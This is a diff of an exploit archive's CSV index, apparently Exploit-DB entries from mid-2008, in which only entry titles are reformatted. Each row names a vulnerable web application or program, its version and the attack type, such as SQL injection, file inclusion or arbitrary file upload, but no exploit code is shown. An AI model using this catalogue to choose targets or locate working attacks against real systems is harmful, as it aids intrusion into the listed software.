5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0 -5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - (filename) File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 +5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe - SQL Injection",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps,0 -5761,platforms/php/webapps/5761.pl,"iJoomla News Portal - (Itemid) SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 -5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion",2008-06-09,Stack,php,webapps,0 +5761,platforms/php/webapps/5761.pl,"iJoomla News Portal - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 +5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 @@ -5393,7 +5394,7 @@ id,file,description,date,author,platform,type,port 5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0 5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 -5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 +5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 @@ -5413,17 +5414,17 @@ id,file,description,date,author,platform,type,port 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 -5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 +5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote Buffer Overflow Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 -5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 +5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 -5797,platforms/php/webapps/5797.txt,"butterfly organizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 +5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 - (aid) SQL Injection",2008-06-13,Houssamix,php,webapps,0 -5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - (aid) SQL Injection",2008-06-13,Houssamix,php,webapps,0 +5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 @@ -5433,18 +5434,18 @@ id,file,description,date,author,platform,type,port 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0 -5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 +5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 -5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 +5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (POST)SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 -5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0 +5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0 5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 @@ -5453,7 +5454,7 @@ id,file,description,date,author,platform,type,port 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 -5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 +5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 @@ -5466,7 +5467,7 @@ id,file,description,date,author,platform,type,port 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart - (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 -5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 +5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 @@ -5495,13 +5496,13 @@ id,file,description,date,author,platform,type,port 5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 -5873,platforms/php/webapps/5873.txt,"lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 +5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0 5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 -5879,platforms/php/webapps/5879.txt,"PHPAuction - 'profile.php user_id' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php user_id' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5880,platforms/php/webapps/5880.txt,"sitexs CMS 0.1.1 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 @@ -5513,7 +5514,7 @@ id,file,description,date,author,platform,type,port 5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php id' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 -5892,platforms/php/webapps/5892.txt,"PHPAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 +5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 5893,platforms/php/webapps/5893.txt,"Joomla Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps,0 5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - (SQL Injection / update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 @@ -5521,14 +5522,14 @@ id,file,description,date,author,platform,type,port 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 -5900,platforms/php/webapps/5900.txt,"RSS-Aggregator - 'display.php path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 +5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'display.php path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 -5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - (header.php) Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 +5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 -5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 +5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) SQL Injection",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation (via SQL Injection)",2008-06-23,Cod3rZ,php,webapps,0 5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'pages.php menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 @@ -5543,9 +5544,9 @@ id,file,description,date,author,platform,type,port 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 -5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - (listing_id) SQL Injection",2008-06-24,K-159,php,webapps,0 +5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 +5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 +5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 @@ -5565,12 +5566,12 @@ id,file,description,date,author,platform,type,port 5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 -5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 +5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 - (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - (drinkid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 -5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - (itemid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 +5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 @@ -5580,21 +5581,21 @@ id,file,description,date,author,platform,type,port 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 -5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds - (lid) SQL Injection",2008-06-27,boom3rang,php,webapps,0 +5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - (lid) SQL Injection",2008-06-27,boom3rang,php,webapps,0 5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 5963,platforms/php/webapps/5963.txt,"Joomla Component jabode - 'id' SQL Injection",2008-06-28,His0k4,php,webapps,0 5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",php,webapps,0 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0 -5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 +5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0 -5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0 @@ -5604,7 +5605,7 @@ id,file,description,date,author,platform,type,port 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 +5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0 5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps,0 5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) SQL Injection",2008-07-01,"Hussin X",php,webapps,0 5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 @@ -5623,43 +5624,43 @@ id,file,description,date,author,platform,type,port 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow Exploit",2008-07-04,"Karol Wiesek",windows,remote,0 -6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 +6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 -6009,platforms/php/webapps/6009.pl,"fuzzylime CMS 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 +6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 -6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 +6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote SEH Overwrite",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,platforms/osx/remote/6013.pl,"Safari / Quicktime 7.3 - RTSP Content-Type Remote Buffer Overflow Exploit",2008-07-06,krafty,osx,remote,0 +6013,platforms/osx/remote/6013.pl,"Safari / QuickTime 7.3 - RTSP Content-Type Remote 